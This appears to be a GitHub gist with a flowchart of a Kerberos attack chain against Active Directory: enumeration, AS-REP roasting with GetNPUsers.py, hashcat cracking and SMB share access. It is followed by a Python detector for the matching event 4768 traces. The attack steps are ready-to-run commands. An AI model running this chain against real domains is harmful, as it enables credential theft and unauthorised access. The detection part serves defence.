@abraidotti
Last active February 26, 2022 15:35
Kerberos Hacking
graph TD
    kerberos-hacking-v1
    1[export IP=target] --> |nmap -sV -sC -A -T4 -vv -oN nmap-$IP.txt $IP| A
    A[is kerberos running? -- typically port 88] -->  B
    B[find Active Directory domain names] -->|enum4linux $IP| C
    C[enumerate AD users] --> |kerbrute userenum --dc $IP -d $AD-DOMAIN /path/to/wordlist.txt| D
    D[find ASREPRoastable names] --> |GetNPUsers.py $AD-DOMAIN/$AD-USER -request -no-pass -dc-ip $IP| E
    E[crack hashes] --> |hashcat -m 18200 -a 0 $AD-USER.hash /path/to/wordlist.txt| F
    F[find SMB shares with password] --> |smbclient -U $AD-DOMAIN/$AD-USER -L //$IP| G
    G[connect to SMB shares] --> |smbclient -U $AD-DOMAIN/$AD-USER //$IP/$DIR| H
    H[look for further data]
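
Steps C and D of the flow leave traces in the domain controller's Security log as event 4768 (Kerberos TGT request). The following is an added detection example, not part of the original gist. It assumes events are already parsed into dicts with the standard 4768 field names; the sample records, the `ENUM_THRESHOLD` value and the function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample: parsed Windows Security event 4768 records.
EVENTS = [
    # TGT issued with no pre-authentication, RC4 (etype 23) reply: matches step D
    {"EventID": 4768, "TargetUserName": "svc-backup", "IpAddress": "10.0.0.50",
     "Status": "0x0", "PreAuthType": "0", "TicketEncryptionType": "0x17"},
    # Ordinary logon: encrypted-timestamp pre-auth (type 2), AES256 ticket
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "Status": "0x0", "PreAuthType": "2", "TicketEncryptionType": "0x12"},
] + [
    # Burst of unknown principals (0x6) from one host: matches step C
    {"EventID": 4768, "TargetUserName": f"guess{i}", "IpAddress": "10.0.0.50",
     "Status": "0x6", "PreAuthType": "-", "TicketEncryptionType": "0xffffffff"}
    for i in range(25)
]

ENUM_THRESHOLD = 20  # assumption: distinct unknown names per source before alerting


def find_asrep_roast_candidates(events):
    """Return (source_ip, account, rc4_reply) for TGTs issued without pre-auth."""
    hits = []
    for e in events:
        if (e["EventID"] == 4768 and e["Status"].lower() == "0x0"
                and e["PreAuthType"] == "0"):
            rc4 = e["TicketEncryptionType"].lower() == "0x17"
            hits.append((e["IpAddress"], e["TargetUserName"], rc4))
    return hits


def find_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Return {source_ip: count} where one source requested many unknown principals."""
    names = defaultdict(set)
    for e in events:
        # 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (requires failure auditing on the DC)
        if e["EventID"] == 4768 and e["Status"].lower() == "0x6":
            names[e["IpAddress"]].add(e["TargetUserName"].lower())
    return {ip: len(n) for ip, n in names.items() if len(n) >= threshold}


if __name__ == "__main__":
    print("no-preauth TGTs:", find_asrep_roast_candidates(EVENTS))
    print("enumeration sources:", find_user_enumeration(EVENTS))
```

Every account returned by `find_asrep_roast_candidates` has "Do not require Kerberos preauthentication" set; re-enabling pre-authentication on those accounts removes the exposure that step D depends on.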